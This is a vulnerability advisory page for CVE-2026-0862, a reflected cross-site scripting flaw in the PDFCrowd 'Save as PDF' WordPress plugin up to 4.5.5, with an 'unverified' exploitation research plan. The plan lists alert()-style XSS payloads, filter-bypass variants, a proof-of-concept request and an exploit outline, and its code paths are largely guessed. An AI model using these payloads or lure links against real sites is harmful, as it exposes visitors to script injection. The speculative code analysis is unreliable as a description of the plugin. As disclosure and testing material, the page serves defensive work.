WP-Safety
CVE-2026-0862

Save as PDF Plugin by PDFCrowd <= 4.5.5 - Reflected Cross-Site Scripting via options

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.1
CVSS Score
6.1
CVSS Score
medium
Severity
4.5.6
Patched in
1d
Time to patch

Description

The Save as PDF Plugin by PDFCrowd plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘options’ parameter in all versions up to, and including, 4.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. NOTE: Successful exploitation of this vulnerability requires that the PDFCrowd API key is blank (also known as "demo mode", which is the default configuration when the plugin is installed) or known.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.5.5
PublishedJanuary 24, 2026
Last updatedJanuary 24, 2026
Affected pluginsave-as-pdf-by-pdfcrowd
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-0862 ## 1. Vulnerability Summary The **Save as PDF Plugin by PDFCrowd** (<= 4.5.5) contains a reflected cross-site scripting (XSS) vulnerability. The plugin fails to sufficiently sanitize and escape the `options` query parameter when processing requests to gen…

Show full research plan

Exploitation Research Plan: CVE-2026-0862

1. Vulnerability Summary

The Save as PDF Plugin by PDFCrowd (<= 4.5.5) contains a reflected cross-site scripting (XSS) vulnerability. The plugin fails to sufficiently sanitize and escape the options query parameter when processing requests to generate PDFs. When the plugin is in "demo mode" (API key is blank, which is the default state), it reflects the options parameter back into the HTML response. This allows an unauthenticated attacker to execute arbitrary JavaScript in the context of the victim's browser session by tricking them into clicking a crafted link.

2. Attack Vector Analysis

  • Vulnerable Endpoint: The site's frontend (any page where the PDF generation is triggered).
  • Trigger Parameter: pdfcrowd (action trigger) and options (payload carrier).
  • Authentication: Unauthenticated (PR:N).
  • Preconditions:
    1. The PDFCrowd API Key must be blank (Default) or the attacker must know a valid API key.
    2. The plugin must be active.
  • Vulnerable Parameter: options.

3. Code Flow

The vulnerability likely exists in the main plugin file or a dedicated handler (e.g., pdfcrowd.php).

  1. Entry Point: The plugin hooks into init or template_redirect to listen for the pdfcrowd query parameter.
    • Likely Hook: add_action('init', array($this, 'process_request')) (inferred).
  2. Condition Check: The code checks if isset($_GET['pdfcrowd']).
  3. Demo Mode Logic: If the API key (stored in get_option('pdfcrowd_api_key')) is empty, the plugin enters demo mode.
  4. Vulnerable Sink: Inside the demo mode handler or during the construction of the PDFCrowd client, the options parameter is retrieved from $_GET['options'].
  5. Reflected Output: The raw value of options is echoed back into the page, likely within a JavaScript block or an HTML attribute used to initialize the PDFCrowd demo overlay/link.
    • Hypothesized Sink: echo '... options: ' . $_GET['options'] . ' ...'; or value="' . $_GET['options'] . '".

4. Nonce Acquisition Strategy

Based on the "Reflected XSS" nature and the fact it targets unauthenticated users for PDF generation, this endpoint typically does not require a nonce for the GET request.

However, if a nonce is required for the pdfcrowd action:

  1. Identify Localization: The plugin likely enqueues a script and localizes a nonce.
  2. Shortcode: Place the [pdfcrowd] shortcode (inferred) or the widget on a page.
  3. Extraction:
    • wp post create --post_type=page --post_status=publish --post_title="PDF Test" --post_content='[pdfcrowd]'
    • Navigate to the page.
    • Check window.pdfcrowd?.nonce (inferred) using browser_eval.

Note: Since the vulnerability is unauthenticated reflected XSS, the primary attack vector is a direct link where the server processes $_GET['options'] immediately on load.

5. Exploitation Strategy

The exploit involves crafting a URL that triggers the pdfcrowd action and includes an XSS payload in the options parameter.

HTTP Request (PoC)

  • Method: GET
  • URL: http://localhost:8080/
  • Parameters:
    • pdfcrowd: save_as_pdf (or the specific action string used by the plugin)
    • options: <script>alert(document.domain)</script>
  • Tool: http_request

Crafted Payload

To bypass potential basic filters or attribute constraints:
?pdfcrowd=save_as_pdf&options="><script>alert(window.origin)</script>

6. Test Data Setup

  1. Install Plugin: Ensure save-as-pdf-by-pdfcrowd version 4.5.5 is installed.
  2. Verify Default State: Confirm the API key is blank.
    • wp option get pdfcrowd_options (check if the api_key field is empty).
  3. Plugin Configuration: No specific settings are needed if the plugin is in its default "demo mode."

7. Expected Results

  1. The HTTP response from the server should contain the raw payload: <script>alert(document.domain)</script>.
  2. If viewed in a browser via browser_navigate, an alert box should trigger.
  3. The Content-Type of the response must be text/html.

8. Verification Steps

  1. Manual Check: Search the response body for the payload.
    • grep -q "<script>alert(document.domain)</script>" response.html
  2. Context Check: Determine where the payload is reflected.
    • If it's inside a <script> tag: Use payload ";alert(1);//.
    • If it's inside an HTML attribute: Use payload "><img src=x onerror=alert(1)>.

9. Alternative Approaches

If the options parameter is expected to be a JSON object or Base64 encoded:

Base64 Bypass (if applicable)

If the plugin uses base64_decode($_GET['options']) before echoing:

  1. Encode payload: echo -n '"><script>alert(1)</script>' | base64
  2. URL: ?pdfcrowd=save_as_pdf&options=Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+

JSON Bypass

If reflected inside a JS object:

  1. Payload: {"key":"value\"};alert(1);//"}
  2. URL: ?pdfcrowd=save_as_pdf&options=%7B%22key%22%3A%22value\%22%7D%3Balert(1)%3B%2F%2F%22%7D
Research Findings
Static analysis — not yet PoC-verified

Summary

The Save as PDF Plugin by PDFCrowd for WordPress is vulnerable to reflected Cross-Site Scripting (XSS) via the 'options' parameter in versions up to 4.5.5. This vulnerability allows unauthenticated attackers to execute arbitrary JavaScript in the context of a victim's browser when the plugin is in its default 'demo mode' (no API key configured).

Exploit Outline

1. Verify the target site is using the plugin in 'demo mode' (default state with no API key provided). 2. Construct a malicious URL using the 'pdfcrowd' trigger and the 'options' query parameter. 3. Include a reflected XSS payload in the 'options' parameter, such as: ?pdfcrowd=save_as_pdf&options="><script>alert(window.origin)</script>. 4. Trick a target user (authenticated or unauthenticated) into clicking the link. 5. The plugin reflects the 'options' value into the HTML response without adequate sanitization or escaping, leading to script execution.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/74172fcb-7428-464a-89f1-f1f3af50e361?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database